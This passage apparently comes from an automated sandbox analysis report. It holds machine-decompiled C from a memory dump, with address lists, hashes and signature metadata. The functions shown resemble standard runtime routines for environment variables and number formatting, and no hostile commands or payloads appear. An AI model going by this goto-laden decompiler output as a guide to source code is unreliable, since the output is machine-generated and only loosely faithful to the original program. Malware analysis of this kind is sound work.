																			_t147 =  *0x6e2e3670; // 0x2b246f0
																			_t156 = _t147;
																			__eflags =  *_t147;
																			if( *_t147 == 0) {
																				L67:
																				_t157 = _t156 - _t147;
																				__eflags = _t157;
																				_t159 =  ~(_t157 >> 2);
																			} else {
																				_t115 = _v0;
																				do {
																					_t82 = E6E21E123(_v4,  *_t156, _t115);
																					_t167 = _t167 + 0xc;
																					__eflags = _t82;
																					if(_t82 != 0) {
																						goto L66;
																					} else {
																						_t84 =  *((intOrPtr*)(_t115 +  *_t156));
																						__eflags = _t84 - 0x3d;
																						if(_t84 == 0x3d) {
																							L69:
																							_t159 = _t156 - _t147 >> 2;
																						} else {
																							__eflags = _t84;
																							if(_t84 == 0) {
																								goto L69;
																							} else {
																								goto L66;
																							}
																						}
																					}
																					goto L68;
																					L66:
																					_t156 =  &(_t156[1]);
																					__eflags =  *_t156;
																				} while ( *_t156 != 0);
																				goto L67;
																			}
																			L68:
																			return _t159;
																		} else {
																			goto L55;
																		}
																	}
																	goto L70;
																	L55:
																	_t146 = _t146 + 4;
																	__eflags =  *_t146 - _t91;
																} while ( *_t146 != _t91);
																goto L57;
															}
														}
													} else {
														_t86 = 0;
														L58:
														return _t86;
													}
												} else {
													_t139 = _v16 + 1 + _t154 - _a4;
													asm("sbb eax, eax");
													 *(_t139 - 1) = _t112;
													_t98 = SetEnvironmentVariableA(_t154,  !( ~(_v5 & 0x000000ff)) & _t139);
													__eflags = _t98;
													if(_t98 == 0) {
														_t99 = E6E20BB7E();
														_t112 = _t112 | 0xffffffff;
														__eflags = _t112;
														 *_t99 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t62;
									if(_t62 == 0) {
										 *0x6e2e3670 = E6E20FB55(_t119, 1, 4);
										E6E20FBB2(_t112);
										_t152 =  *0x6e2e3670; // 0x2b246f0
										_t166 = _t166 + 0xc;
										__eflags = _t152;
										if(_t152 == 0) {
											goto L11;
										} else {
											__eflags =  *0x6e2e3674 - _t112; // 0x0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x6e2e3674 = E6E20FB55(_t119, 1, 4);
												E6E20FBB2(_t112);
												_t166 = _t166 + 0xc;
												__eflags =  *0x6e2e3674 - _t112; // 0x0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t112 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x6e2e3674 - _t112; // 0x0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t108 = L6E20E638(0);
										__eflags = _t108;
										if(_t108 != 0) {
											L19:
											_t152 =  *0x6e2e3670; // 0x2b246f0
											L20:
											__eflags = _t152;
											if(_t152 == 0) {
												L11:
												_t112 = _t111 | 0xffffffff;
												__eflags = _t112;
												L12:
												E6E20FBB2(_t144);
												_t61 = _t112;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E6E20BB7E();
					 *_t109 = 0x16;
					_t61 = _t109 | 0xffffffff;
					L13:
					return _t61;
				}
				L70:
			}

























































    0x6e219204
    0x6e219209
    0x6e219220
    0x6e219222
    0x6e219227
    0x6e21922b
    0x6e21922c
    0x6e21922e
    0x6e21927e
    0x6e219283
    0x00000000
    0x6e219230
    0x6e219230
    0x6e219232
    0x00000000
    0x6e219234
    0x6e219234
    0x6e219238
    0x6e21923e
    0x6e219241
    0x6e219244
    0x6e21924a
    0x6e21924d
    0x6e219252
    0x6e219254
    0x6e219257
    0x6e219258
    0x6e219258
    0x6e21925e
    0x6e219260
    0x6e219262
    0x6e2192f6
    0x6e2192f9
    0x6e2192fb
    0x6e2192fd
    0x6e2192fe
    0x6e2192ff
    0x6e219304
    0x6e219309
    0x6e21930b
    0x6e219355
    0x6e219355
    0x6e219358
    0x00000000
    0x6e21935e
    0x6e21935e
    0x6e219360
    0x6e219363
    0x6e219363
    0x6e219366
    0x6e219368
    0x00000000
    0x6e21936e
    0x6e21936e
    0x6e219374
    0x00000000
    0x6e21937a
    0x6e21937a
    0x6e21937c
    0x6e219384
    0x6e219386
    0x6e21938b
    0x6e21938e
    0x6e219390
    0x00000000
    0x6e219396
    0x6e219396
    0x6e219399
    0x6e21939b
    0x6e21939e
    0x6e2193a1
    0x00000000
    0x6e2193a1
    0x6e219390
    0x6e219374
    0x6e219368
    0x6e21930d
    0x6e21930d
    0x6e21930f
    0x00000000
    0x6e219311
    0x6e219314
    0x6e21931a
    0x6e21931d
    0x6e219320
    0x6e219334
    0x6e219334
    0x6e219337
    0x00000000
    0x00000000
    0x6e219330
    0x6e219333
    0x6e219333
    0x6e219333
    0x6e219339
    0x6e21933b
    0x6e219343
    0x6e219345
    0x6e21934a
    0x6e21934d
    0x6e21934f
    0x6e219351
    0x6e2193a5
    0x6e2193a5
    0x6e2193a5
    0x6e219322
    0x6e219322
    0x6e219325
    0x6e219327
    0x6e219327
    0x6e2193ab
    0x6e2193ae
    0x00000000
    0x6e2193b4
    0x6e2193b4
    0x6e2193b6
    0x6e2193b9
    0x6e2193b9
    0x6e2193bb
    0x6e2193bc
    0x6e2193bc
    0x6e2193c8
    0x6e2193d0
    0x6e2193d3
    0x6e2193d4
    0x6e2193d6
    0x6e21941f
    0x6e219420
    0x00000000
    0x6e2193d8
    0x6e2193df
    0x6e2193e4
    0x6e2193e7
    0x6e2193e9
    0x6e21942b
    0x6e21942c
    0x6e21942d
    0x6e21942e
    0x6e21942f
    0x6e219430
    0x6e219435
    0x6e219439
    0x6e21943c
    0x6e21943d
    0x6e219440
    0x6e219442
    0x6e21944b
    0x6e21944d
    0x6e21944f
    0x6e219451
    0x6e219453
    0x6e219453
    0x6e219456
    0x6e219457
    0x6e219457
    0x6e219453
    0x6e21945c
    0x6e21945d
    0x6e219468
    0x6e21946c
    0x6e21946e
    0x6e2194d5
    0x6e2194d5
    0x00000000
    0x6e219470
    0x6e219470
    0x6e219473
    0x6e2194c5
    0x6e2194c7
    0x6e2194cd
    0x00000000
    0x6e219475
    0x6e219475
    0x6e219478
    0x6e219478
    0x6e21947a
    0x6e21947a
    0x6e21947c
    0x6e21947c
    0x6e21947f
    0x6e21947f
    0x6e219481
    0x6e219482
    0x6e219482
    0x6e21948a
    0x6e21948e
    0x6e219498
    0x6e21949b
    0x6e2194a0
    0x6e2194a3
    0x6e2194a7
    0x00000000
    0x6e2194a9
    0x6e2194b1
    0x6e2194b6
    0x6e2194b9
    0x6e2194bb
    0x6e2194da
    0x6e2194dc
    0x6e2194dd
    0x6e2194de
    0x6e2194df
    0x6e2194e0
    0x6e2194e1
    0x6e2194e6
    0x6e2194e9
    0x6e2194ec
    0x6e2194ed
    0x6e2194ee
    0x6e2194ef
    0x6e2194f5
    0x6e2194f7
    0x6e2194fa
    0x6e219526
    0x6e219526
    0x6e219526
    0x6e21952b
    0x6e2194fc
    0x6e2194fc
    0x6e2194ff
    0x6e219505
    0x6e21950a
    0x6e21950d
    0x6e21950f
    0x00000000
    0x6e219511
    0x6e219513
    0x6e219516
    0x6e219518
    0x6e219534
    0x6e219536
    0x6e21951a
    0x6e21951a
    0x6e21951c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e21951c
    0x6e219518
    0x00000000
    0x6e21951e
    0x6e21951e
    0x6e219521
    0x6e219521
    0x00000000
    0x6e2194ff
    0x6e21952d
    0x6e219533
    0x00000000
    0x00000000
    0x00000000
    0x6e2194bb
    0x00000000
    0x6e2194bd
    0x6e2194bd
    0x6e2194c0
    0x6e2194c0
    0x00000000
    0x6e2194c4
    0x6e219473
    0x6e219444
    0x6e219444
    0x6e2194d0
    0x6e2194d4
    0x6e2194d4
    0x6e2193eb
    0x6e2193f4
    0x6e2193fc
    0x6e219400
    0x6e219407
    0x6e21940d
    0x6e21940f
    0x6e219411
    0x6e219416
    0x6e219416
    0x6e219419
    0x6e219419
    0x00000000
    0x6e21940f
    0x6e2193e9
    0x6e2193d6
    0x6e2193ae
    0x6e21930f
    0x6e219268
    0x6e219268
    0x6e21926b
    0x6e21929c
    0x6e21929c
    0x6e21929e
    0x6e2192ae
    0x6e2192b3
    0x6e2192b8
    0x6e2192be
    0x6e2192c1
    0x6e2192c3
    0x00000000
    0x6e2192c5
    0x6e2192c5
    0x6e2192cb
    0x00000000
    0x6e2192cd
    0x6e2192d7
    0x6e2192dc
    0x6e2192e1
    0x6e2192e4
    0x6e2192ea
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e2192ea
    0x6e2192cb
    0x6e2192a0
    0x6e2192a0
    0x00000000
    0x6e2192a0
    0x6e21926d
    0x6e21926d
    0x6e219273
    0x00000000
    0x6e219275
    0x6e219275
    0x6e21927a
    0x6e21927c
    0x6e2192ec
    0x6e2192ec
    0x6e2192f2
    0x6e2192f2
    0x6e2192f4
    0x6e219289
    0x6e219289
    0x6e219289
    0x6e21928c
    0x6e21928d
    0x6e219294
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e21927c
    0x6e219273
    0x6e21926b
    0x6e219262
    0x6e219232
    0x6e21920b
    0x6e21920b
    0x6e219210
    0x6e219216
    0x6e219297
    0x6e21929b
    0x6e21929b
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
    • String ID:
    • API String ID: 1282221369-0
    • Opcode ID: 926a15f024be09cb52c67ff7cf4db2905873b7ef09b6e77951f2d988966526a5
    • Instruction ID: 37ba3272bc09506494c4173641af7d9d62c9b26f7280df3dd0a3ef46c8b9b08f
    • Opcode Fuzzy Hash: 926a15f024be09cb52c67ff7cf4db2905873b7ef09b6e77951f2d988966526a5
    • Instruction Fuzzy Hash: 9C61477590C71AAFEF119FF88898ADA7BFBAF06315F0005ADDA15972C4DB318610C761
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1FE050, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 400COMMON
    Download Yara Rule
    C-Code - Quality: 90%
    			E6E1FE050(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char* _a28, intOrPtr _a32) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v44;
				char _v68;
				signed int _v72;
				signed char _v73;
				char* _v80;
				short _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				signed int _v104;
				void* _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				signed int _t192;
				signed int _t193;
				signed int _t195;
				intOrPtr* _t231;
				intOrPtr* _t236;
				intOrPtr* _t248;
				intOrPtr* _t252;
				intOrPtr* _t255;
				intOrPtr* _t259;
				void* _t260;
				char _t274;
				signed int _t280;
				short _t289;
				void* _t355;
				signed int _t370;
				void* _t392;
				void* _t395;
				void* _t396;
				signed int _t397;

				_t396 = __esi;
				_t395 = __edi;
				_t283 = __ebx;
				_push(0xffffffff);
				_push(0x6e21fd86);
				_push( *[fs:0x0]);
				_t192 =  *0x6e24b164; // 0x1dc3c76f
				_t193 = _t192 ^ _t397;
				_v20 = _t193;
				_push(__ebx);
				_push(_t193);
				 *[fs:0x0] =  &_v16;
				if(_a32 <= 0 ||  *_a28 != 0x2b &&  *_a28 != 0x2d) {
					_v108 = 0;
				} else {
					_v108 = 1;
				}
				_v72 = _v108;
				_t195 = E6E200E40(_a20);
				_t412 = (_t195 & 0x00003000) - 0x3000;
				if((_t195 & 0x00003000) == 0x3000) {
					_v112 = 0x6e23a78c;
					__eflags = _v72 + 2 - _a32;
					if(_v72 + 2 > _a32) {
						goto L12;
					}
					__eflags =  *((char*)(_a28 + _v72)) - 0x30;
					if( *((char*)(_a28 + _v72)) != 0x30) {
						goto L12;
					}
					_t392 = _a28 + _v72;
					__eflags =  *((char*)(_t392 + 1)) - 0x78;
					if( *((char*)(_t392 + 1)) == 0x78) {
						L11:
						_t280 = _v72 + 2;
						__eflags = _t280;
						_v72 = _t280;
						goto L12;
					}
					_t355 = _a28 + _v72;
					__eflags =  *((char*)(_t355 + 1)) - 0x58;
					if( *((char*)(_t355 + 1)) != 0x58) {
						goto L12;
					}
					goto L11;
				} else {
					_v112 = 0x6e23a788;
					L12:
					_v144 = E6E2089B0(_v112, 0 + _a28, _v112);
					_t289 =  *0x6e23a790; // 0x2e
					_v84 = _t289;
					 *((char*)(_t397 + 0xffffffffffffffb0)) =  *((intOrPtr*)(0 +  *((intOrPtr*)(E6E20A23B(_t283, 1)))));
					_v92 = E6E2089B0(_t397 + 0xffffffffffffffb0, 0 + _a28, _t397 + 0xffffffffffffffb0);
					_v124 = E6E200F40(_a20, _t412,  &_v160);
					_v128 = _v124;
					_v8 = 0;
					_v132 = E6E1F9750(_t283, _t395, _t396, _t412, _v128);
					_v8 = 0xffffffff;
					E6E1FAA70( &_v160);
					E6E1F9C50(_a32, 0);
					_v8 = 1;
					E6E201610(_v132, 0 + _a28, _a28 + _a32, E6E1FB020( &_v44, 0));
					_v136 = E6E200F40(_a20, _t412,  &_v168);
					_v140 = _v136;
					_v8 = 2;
					_v100 = E6E1F9990(_t395, _t412, _v140);
					_v8 = 1;
					E6E1FAA70( &_v168);
					E6E200FB0(_v100,  &_v68);
					_v8 = 3;
					_v73 = E6E201540(_v100);
					if(_v92 != _a32) {
						_t274 = E6E200130(_v100);
						 *((char*)(E6E1FB020( &_v44, _v92))) = _t274;
					}
					if(_v92 != _a32) {
						_v116 = _v92;
					} else {
						_v116 = _v144;
					}
					_t370 = _v116;
					_v96 = _t370;
					_v80 = E6E1FB020( &_v68, 0);
					while( *_v80 != 0x7f) {
						_t370 = _v80;
						if( *_t370 <= 0) {
							break;
						}
						_t370 =  *_v80;
						if(_t370 >= _v96 - _v72) {
							break;
						}
						_v96 = _v96 -  *_v80;
						E6E200FF0( &_v44, _v96, 1, _v73 & 0x000000ff);
						_t370 =  *((char*)(_v80 + (1 << 0)));
						if(_t370 > 0) {
							_v80 = _v80 + 1;
						}
					}
					_a32 = E6E2010F0( &_v44);
					_v152 = E6E201680(_a20);
					_v148 = _t370;
					__eflags = _v148;
					if(__eflags < 0) {
						L29:
						_v120 = 0;
						L30:
						_v88 = _v120;
						_v104 = E6E200E40(_a20) & 0x000001c0;
						__eflags = _v104 - 0x40;
						if(_v104 == 0x40) {
							L33:
							__eflags = _v104 - 0x100;
							if(_v104 != 0x100) {
								_t231 = E6E1FF400(_a4,  &_v208, _a12, _a16, E6E1FB020( &_v44, 0), _v72);
								_a12 =  *_t231;
								_a16 =  *((intOrPtr*)(_t231 + 4));
							} else {
								_t248 = E6E1FF400(_a4,  &_v192, _a12, _a16, E6E1FB020( &_v44, 0), _v72);
								_a12 =  *_t248;
								_a16 =  *((intOrPtr*)(_t248 + 4));
								_t252 = E6E1FF450(_a4,  &_v200, _a12, _a16, _a24 & 0x000000ff, _v88);
								_a12 =  *_t252;
								_a16 =  *((intOrPtr*)(_t252 + 4));
								_v88 = 0;
							}
							L36:
							_t236 = E6E1FF400(_a4,  &_v216, _a12, _a16, E6E1FB020( &_v44, _v72), _a32 - _v72);
							_a12 =  *_t236;
							_a16 =  *((intOrPtr*)(_t236 + 4));
							E6E201640(_a20, 0, 0);
							E6E1FF450(_a4, _a8, _a12, _a16, _a24 & 0x000000ff, _v88);
							_v8 = 1;
							E6E1FA720();
							_v8 = 0xffffffff;
							E6E1FA720();
							 *[fs:0x0] = _v16;
							__eflags = _v20 ^ _t397;
							return E6E203D51(_v20 ^ _t397);
						}
						__eflags = _v104 - 0x100;
						if(_v104 == 0x100) {
							goto L33;
						}
						_t255 = E6E1FF450(_a4,  &_v176, _a12, _a16, _a24 & 0x000000ff, _v88);
						_a12 =  *_t255;
						_a16 =  *((intOrPtr*)(_t255 + 4));
						_v88 = 0;
						_t259 = E6E1FF400(_a4,  &_v184, _a12, _a16, E6E1FB020( &_v44, 0), _v72);
						_a12 =  *_t259;
						_a16 =  *((intOrPtr*)(_t259 + 4));
						goto L36;
					}
					if(__eflags > 0) {
						L27:
						_t260 = E6E201680(_a20);
						__eflags = _t260 - _a32;
						if(_t260 <= _a32) {
							goto L29;
						}
						_v120 = E6E201680(_a20) - _a32;
						goto L30;
					}
					__eflags = _v152;
					if(_v152 <= 0) {
						goto L29;
					}
					goto L27;
				}
			}
























































    0x6e1fe050
    0x6e1fe050
    0x6e1fe050
    0x6e1fe053
    0x6e1fe055
    0x6e1fe060
    0x6e1fe067
    0x6e1fe06c
    0x6e1fe06e
    0x6e1fe071
    0x6e1fe072
    0x6e1fe076
    0x6e1fe080
    0x6e1fe0a1
    0x6e1fe098
    0x6e1fe098
    0x6e1fe098
    0x6e1fe0ab
    0x6e1fe0b1
    0x6e1fe0bb
    0x6e1fe0c0
    0x6e1fe0cb
    0x6e1fe0d8
    0x6e1fe0db
    0x00000000
    0x00000000
    0x6e1fe0e6
    0x6e1fe0e9
    0x00000000
    0x00000000
    0x6e1fe0ee
    0x6e1fe0f5
    0x6e1fe0f8
    0x6e1fe109
    0x6e1fe10c
    0x6e1fe10c
    0x6e1fe10f
    0x00000000
    0x6e1fe10f
    0x6e1fe0fd
    0x6e1fe104
    0x6e1fe107
    0x00000000
    0x00000000
    0x00000000
    0x6e1fe0c2
    0x6e1fe0c2
    0x6e1fe112
    0x6e1fe12a
    0x6e1fe130
    0x6e1fe137
    0x6e1fe155
    0x6e1fe17a
    0x6e1fe18c
    0x6e1fe192
    0x6e1fe195
    0x6e1fe1a8
    0x6e1fe1ab
    0x6e1fe1b8
    0x6e1fe1c6
    0x6e1fe1cb
    0x6e1fe1f3
    0x6e1fe207
    0x6e1fe213
    0x6e1fe219
    0x6e1fe22c
    0x6e1fe22f
    0x6e1fe239
    0x6e1fe245
    0x6e1fe24a
    0x6e1fe256
    0x6e1fe25f
    0x6e1fe264
    0x6e1fe277
    0x6e1fe277
    0x6e1fe27f
    0x6e1fe28f
    0x6e1fe281
    0x6e1fe287
    0x6e1fe287
    0x6e1fe292
    0x6e1fe295
    0x6e1fe2a2
    0x6e1fe2a5
    0x6e1fe2b0
    0x6e1fe2b8
    0x00000000
    0x00000000
    0x6e1fe2bd
    0x6e1fe2c8
    0x00000000
    0x00000000
    0x6e1fe2d5
    0x6e1fe2e6
    0x6e1fe2f6
    0x6e1fe2fc
    0x6e1fe304
    0x6e1fe304
    0x6e1fe307
    0x6e1fe311
    0x6e1fe31c
    0x6e1fe322
    0x6e1fe328
    0x6e1fe32f
    0x6e1fe359
    0x6e1fe359
    0x6e1fe360
    0x6e1fe363
    0x6e1fe373
    0x6e1fe376
    0x6e1fe37a
    0x6e1fe3f5
    0x6e1fe3f5
    0x6e1fe3fc
    0x6e1fe48d
    0x6e1fe49a
    0x6e1fe49d
    0x6e1fe3fe
    0x6e1fe420
    0x6e1fe42d
    0x6e1fe430
    0x6e1fe44f
    0x6e1fe45c
    0x6e1fe45f
    0x6e1fe462
    0x6e1fe462
    0x6e1fe4a0
    0x6e1fe4c7
    0x6e1fe4d4
    0x6e1fe4d7
    0x6e1fe4e1
    0x6e1fe4ff
    0x6e1fe507
    0x6e1fe50e
    0x6e1fe513
    0x6e1fe51d
    0x6e1fe528
    0x6e1fe534
    0x6e1fe53e
    0x6e1fe53e
    0x6e1fe37c
    0x6e1fe383
    0x00000000
    0x00000000
    0x6e1fe3a1
    0x6e1fe3ae
    0x6e1fe3b1
    0x6e1fe3b4
    0x6e1fe3dd
    0x6e1fe3ea
    0x6e1fe3ed
    0x00000000
    0x6e1fe3ed
    0x6e1fe331
    0x6e1fe33c
    0x6e1fe33f
    0x6e1fe344
    0x6e1fe347
    0x00000000
    0x00000000
    0x6e1fe354
    0x00000000
    0x6e1fe354
    0x6e1fe333
    0x6e1fe33a
    0x00000000
    0x00000000
    0x00000000
    0x6e1fe33a

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
    • String ID: @
    • API String ID: 2441703863-2766056989
    • Opcode ID: 0728ea76830641ea30d73bada7a10df1088d8e180b517f196e7987b6dc57275d
    • Instruction ID: b0ee97cdc12a571e27bda8c7488c37ccb62aa156a08ca2197c67e976292d9537
    • Opcode Fuzzy Hash: 0728ea76830641ea30d73bada7a10df1088d8e180b517f196e7987b6dc57275d
    • Instruction Fuzzy Hash: 60022CB1900248DFDB04CFD8C990BDEBBF9BF48304F148559E519AB295D734AA86DF90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1FECE0, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 352COMMON
    Download Yara Rule
    C-Code - Quality: 90%
    			E6E1FECE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char* _a28, intOrPtr _a32) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v44;
				char _v68;
				intOrPtr _v72;
				char* _v76;
				signed char _v77;
				intOrPtr _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v184;
				char _v192;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t195;
				intOrPtr* _t200;
				intOrPtr* _t211;
				intOrPtr* _t214;
				intOrPtr* _t217;
				intOrPtr* _t221;
				void* _t223;
				intOrPtr _t238;
				void* _t241;
				char* _t314;
				void* _t343;
				void* _t344;
				signed int _t345;
				intOrPtr _t363;

				_t344 = __esi;
				_t343 = __edi;
				_t241 = __ebx;
				_push(0xffffffff);
				_push(0x6e21fea6);
				_push( *[fs:0x0]);
				_t168 =  *0x6e24b164; // 0x1dc3c76f
				_t169 = _t168 ^ _t345;
				_v20 = _t169;
				_push(_t169);
				 *[fs:0x0] =  &_v16;
				if(_a32 <= 0 ||  *_a28 != 0x2b &&  *_a28 != 0x2d) {
					_v92 = 0;
				} else {
					_v92 = 1;
				}
				_v72 = _v92;
				if((E6E200E40(_a20) & 0x00000e00) == 0x800 && _v72 + 2 <= _a32 &&  *((char*)(_a28 + _v72)) == 0x30 && ( *((char*)(_a28 + _v72 + 1)) == 0x78 ||  *((char*)(_a28 + _v72 + 1)) == 0x58)) {
					_t238 = _v72 + 2;
					_t363 = _t238;
					_v72 = _t238;
				}
				_v104 = E6E200F40(_a20, _t363,  &_v136);
				_v108 = _v104;
				_v8 = 0;
				_v112 = E6E1F9750(_t241, _t343, _t344, _t363, _v108);
				_v8 = 0xffffffff;
				E6E1FAA70( &_v136);
				E6E1F9C50(_a32, 0);
				_v8 = 1;
				E6E201610(_v112, 0 + _a28, _a28 + _a32, E6E1FB020( &_v44, 0));
				_v116 = E6E200F40(_a20, _t363,  &_v144);
				_v120 = _v116;
				_v8 = 2;
				_v96 = E6E1F9990(_t343, _t363, _v120);
				_v8 = 1;
				E6E1FAA70( &_v144);
				_t314 =  &_v68;
				E6E200FB0(_v96, _t314);
				_v8 = 3;
				_v76 = E6E1FB020( &_v68, 0);
				if( *_v76 == 0x7f) {
					L20:
					_a32 = E6E2010F0( &_v44);
					_v128 = E6E201680(_a20);
					_v124 = _t314;
					__eflags = _v124;
					if(__eflags < 0) {
						L25:
						_v100 = 0;
						L26:
						_v84 = _v100;
						_v88 = E6E200E40(_a20) & 0x000001c0;
						__eflags = _v88 - 0x40;
						if(_v88 == 0x40) {
							L29:
							__eflags = _v88 - 0x100;
							if(_v88 != 0x100) {
								_t195 = E6E1FF400(_a4,  &_v184, _a12, _a16, E6E1FB020( &_v44, 0), _v72);
								_a12 =  *_t195;
								_a16 =  *((intOrPtr*)(_t195 + 4));
							} else {
								_t211 = E6E1FF400(_a4,  &_v168, _a12, _a16, E6E1FB020( &_v44, 0), _v72);
								_a12 =  *_t211;
								_a16 =  *((intOrPtr*)(_t211 + 4));
								_t214 = E6E1FF450(_a4,  &_v176, _a12, _a16, _a24 & 0x000000ff, _v84);
								_a12 =  *_t214;
								_a16 =  *((intOrPtr*)(_t214 + 4));
								_v84 = 0;
							}
							L32:
							_t200 = E6E1FF400(_a4,  &_v192, _a12, _a16, E6E1FB020( &_v44, _v72), _a32 - _v72);
							_a12 =  *_t200;
							_a16 =  *((intOrPtr*)(_t200 + 4));
							E6E201640(_a20, 0, 0);
							E6E1FF450(_a4, _a8, _a12, _a16, _a24 & 0x000000ff, _v84);
							_v8 = 1;
							E6E1FA720();
							_v8 = 0xffffffff;
							E6E1FA720();
							 *[fs:0x0] = _v16;
							__eflags = _v20 ^ _t345;
							return E6E203D51(_v20 ^ _t345);
						}
						__eflags = _v88 - 0x100;
						if(_v88 == 0x100) {
							goto L29;
						}
						_t217 = E6E1FF450(_a4,  &_v152, _a12, _a16, _a24 & 0x000000ff, _v84);
						_a12 =  *_t217;
						_a16 =  *((intOrPtr*)(_t217 + 4));
						_v84 = 0;
						_t221 = E6E1FF400(_a4,  &_v160, _a12, _a16, E6E1FB020( &_v44, 0), _v72);
						_a12 =  *_t221;
						_a16 =  *((intOrPtr*)(_t221 + 4));
						goto L32;
					}
					if(__eflags > 0) {
						L23:
						_t223 = E6E201680(_a20);
						__eflags = _t223 - _a32;
						if(_t223 <= _a32) {
							goto L25;
						}
						_v100 = E6E201680(_a20) - _a32;
						goto L26;
					}
					__eflags = _v128;
					if(_v128 <= 0) {
						goto L25;
					}
					goto L23;
				} else {
					_t314 = _v76;
					if( *_t314 <= 0) {
						goto L20;
					}
					_v77 = E6E201540(_v96);
					while(1) {
						_t314 =  *_v76;
						if(_t314 == 0x7f ||  *_v76 <= 0) {
							goto L20;
						}
						_t314 = _v76;
						if( *_t314 >= _a32 - _v72) {
							goto L20;
						}
						_a32 = _a32 -  *_v76;
						E6E200FF0( &_v44, _a32, 1, _v77 & 0x000000ff);
						if( *((char*)(_v76 + (1 << 0))) > 0) {
							_v76 = _v76 + 1;
						}
					}
					goto L20;
				}
			}















































    0x6e1fece0
    0x6e1fece0
    0x6e1fece0
    0x6e1fece3
    0x6e1fece5
    0x6e1fecf0
    0x6e1fecf7
    0x6e1fecfc
    0x6e1fecfe
    0x6e1fed01
    0x6e1fed05
    0x6e1fed0f
    0x6e1fed30
    0x6e1fed27
    0x6e1fed27
    0x6e1fed27
    0x6e1fed3a
    0x6e1fed4f
    0x6e1fed8b
    0x6e1fed8b
    0x6e1fed8e
    0x6e1fed8e
    0x6e1feda0
    0x6e1feda6
    0x6e1feda9
    0x6e1fedbc
    0x6e1fedbf
    0x6e1fedcc
    0x6e1fedda
    0x6e1feddf
    0x6e1fee07
    0x6e1fee1b
    0x6e1fee21
    0x6e1fee24
    0x6e1fee34
    0x6e1fee37
    0x6e1fee41
    0x6e1fee46
    0x6e1fee4d
    0x6e1fee52
    0x6e1fee60
    0x6e1fee6c
    0x6e1feee7
    0x6e1feeef
    0x6e1feefa
    0x6e1feefd
    0x6e1fef00
    0x6e1fef04
    0x6e1fef2b
    0x6e1fef2b
    0x6e1fef32
    0x6e1fef35
    0x6e1fef45
    0x6e1fef48
    0x6e1fef4c
    0x6e1fefc7
    0x6e1fefc7
    0x6e1fefce
    0x6e1ff05f
    0x6e1ff06c
    0x6e1ff06f
    0x6e1fefd0
    0x6e1feff2
    0x6e1fefff
    0x6e1ff002
    0x6e1ff021
    0x6e1ff02e
    0x6e1ff031
    0x6e1ff034
    0x6e1ff034
    0x6e1ff072
    0x6e1ff099
    0x6e1ff0a6
    0x6e1ff0a9
    0x6e1ff0b3
    0x6e1ff0d1
    0x6e1ff0d9
    0x6e1ff0e0
    0x6e1ff0e5
    0x6e1ff0ef
    0x6e1ff0fa
    0x6e1ff105
    0x6e1ff10f
    0x6e1ff10f
    0x6e1fef4e
    0x6e1fef55
    0x00000000
    0x00000000
    0x6e1fef73
    0x6e1fef80
    0x6e1fef83
    0x6e1fef86
    0x6e1fefaf
    0x6e1fefbc
    0x6e1fefbf
    0x00000000
    0x6e1fefbf
    0x6e1fef06
